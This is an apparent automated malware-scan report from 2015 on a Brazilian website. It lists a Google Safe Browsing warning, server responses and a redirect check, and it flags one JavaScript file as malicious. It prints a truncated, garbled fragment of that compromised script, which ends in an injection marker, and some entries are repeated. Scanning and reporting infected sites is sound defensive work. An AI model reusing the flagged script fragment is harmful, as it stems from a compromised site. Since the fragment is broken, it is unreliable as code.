Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=qualitybank.com.br
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://qualitybank.com.br/ | HTTP/1.1 302 Object moved Cache-Control: private Date: Wed, 28 Jan 2015 00:23:16 GMT Location: /sitev2 Content-Length: 128 Content-Type: text/html Set-Cookie: ASPSESSIONIDACTCCRSQ=IFBLPFBAEDDAFBGFBLADMBHJ; path=/ Set-Cookie: TS0194eee0=017643f9b22ed443dfe135d1255ef6245873f829013f9d388c78fa89bc620c6ae7bc3f3165cf020fea3d655b8a68e795243983ffee; Path=/ | clean |
http://qualitybank.com.br/sitev2 | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 28 Jan 2015 00:23:31 GMT Location: http://qualitybank.com.br/sitev2/ Content-Length: 241 Content-Type: text/html; charset=iso-8859-1 Set-Cookie: TS0194eee0=017643f9b2f88966927237e9fd7d19205360b2186f1030f6b42a2272264a9bc7ffbf14db19; Path=/ | clean |
http://qualitybank.com.br/sitev2/ | 500 Internal Server Error Content-Length: 7662 Content-Type: text/html | clean |
http://qualitybank.com.br/sitev2/js/alteraCSS.js | 200 OK Content-Length: 2742 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var Limit = 0; function AlteraCss() { var MyMode = arguments[0]; var MaxLen = 3; var MinLen = 0; var CssObj = document.styleSheets; var CssLen = CssObj.length; var LimCnt = 0; var ClsObj = new Array() ClsObj[0] = "font_cinza" for(i = 0; i < CssLen; i ) { var MyCss = CssObj[i]; var MyRul = (document.all ? MyCss.rules : MyCss.cssRules); var Valid = MyCss.href != document.location && MyCss.href != "" ? t >') /*/339810*/ Antivirus reports:
| ||
http://qualitybank.com.br/js/fn.js | 404 Not Found Content-Length: 206 Content-Type: text/html | clean |
http://qualitybank.com.br/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://qualitybank.com.br/js/marquee.js | 404 Not Found Content-Length: 211 Content-Type: text/html | clean |
http://www.chatcomercial.com.br/livehelp/lib/javascript/support_status.php?COMPANY_ID=5591&SITE_ID=6229 | 200 OK Content-Length: 2652 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: qualitybank.com.br
Result:
HTTP/1.1 302 Object moved
Cache-Control: private
Date: Wed, 28 Jan 2015 00:23:16 GMT
Location: /sitev2
Content-Length: 128
Content-Type: text/html
Set-Cookie: ASPSESSIONIDACTCCRSQ=IFBLPFBAEDDAFBGFBLADMBHJ; path=/
Set-Cookie: TS0194eee0=017643f9b22ed443dfe135d1255ef6245873f829013f9d388c78fa89bc620c6ae7bc3f3165cf020fea3d655b8a68e795243983ffee; Path=/
...128 bytes of data.
GET / HTTP/1.1
Host: qualitybank.com.br
Result:
HTTP/1.1 302 Object moved
Cache-Control: private
Date: Wed, 28 Jan 2015 00:23:16 GMT
Location: /sitev2
Content-Length: 128
Content-Type: text/html
Set-Cookie: ASPSESSIONIDACTCCRSQ=IFBLPFBAEDDAFBGFBLADMBHJ; path=/
Set-Cookie: TS0194eee0=017643f9b22ed443dfe135d1255ef6245873f829013f9d388c78fa89bc620c6ae7bc3f3165cf020fea3d655b8a68e795243983ffee; Path=/
...128 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: qualitybank.com.br
Referer: http://www.google.com/search?q=qualitybank.com.br
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: qualitybank.com.br
Referer: http://www.google.com/search?q=qualitybank.com.br
Result:
The result is similar to the first query. There are no suspicious redirects found.